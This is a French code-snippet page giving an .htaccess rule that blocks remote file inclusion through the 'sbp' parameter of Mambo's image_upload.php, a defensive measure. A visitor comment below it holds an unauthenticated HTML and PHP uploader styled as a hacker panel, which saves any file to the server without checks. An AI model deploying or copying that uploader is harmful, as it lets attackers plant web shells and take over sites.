Corriger la faille touchant mambo via image_upload.php

Information

Le CMS mambo peut être victime d'attaque par inclusion de fichiers externes.

La prise de contrôle de votre site en est le but ultime.

Le script concerné est image_upload.php avec un paramèyre sbp.

Cette petite règle dans le fichier .htaccess vous protégera car il renverra un code 403 (accès interdit) aux hackers.

Forty

15 Juin 2008

Code Source à télécharger

Information sur les mises à jour

Dernière mise à jour :

18 Aout 2019

9 753 vues

Compatibilité du code

PHP 5, PHP 7 et PHP 8

Site internet de l'auteur

code source classé dans .HTACCESS ANTI HACK

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15

                               
                            /*
 Titre : Corriger la faille touchant mambo via image_upload.php                                                           
                                                                                                                          
 Auteur           : Forty                                                                                                 
 Website auteur   : http://www.toplien.fr/                                                                                
 Date édition     : 15 Juin 2008                                                                                         
 Date mise a jour : 18 Aout 2019
                                                                                         
 Rapport de la maj:                                                                                                       
  - fonctionnement du code vérifié                                                                                  
*/
/*------------------------------*/?>
RewriteCond %{QUERY_STRING} ^(.*&)?sbp=http://
RewriteRule ^(.*/)?components/com_simpleboard/image_upload\.php$ - [F,L]

[1]

Invité
28 Fév 2015 à 01:37

<head>

<style>



</style>

</head>

<table style="BORDER-COLLAPSE: collapse" cellspacing="0" bordercolordark="#666666" cellpadding="5" height="1" width="100%" bgcolor="#000000" bordercolorlight="#c0c0c0" border="1">

<tr>

<a bookmark="minipanel" style="font-weight: normal; color: #009900; font-family: verdana; text-decoration: none">

<td width="50%" height="1" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px">

<center>Upload<form method="POST" enctype="multipart/form-data">

<input type="hidden" name="act" value="upload" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #009900">

<input type="file" name="userfile" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #009900"><input type="hidden" name="miniform" value="1" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #009900">

<input type="submit" name="submit" value="Upload" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #009900"><br><br>

<?php

$uploaddir = "";

$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (isset($_FILES['userfile']['name'])) {

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {

echo "The file ". basename($_FILES['userfile']['name']) ." has been uploaded";

} else {

echo "There was an error uploading the file. please try again!";

}

}

?>

</form>

</center></td>

</tr>

</table>

</a>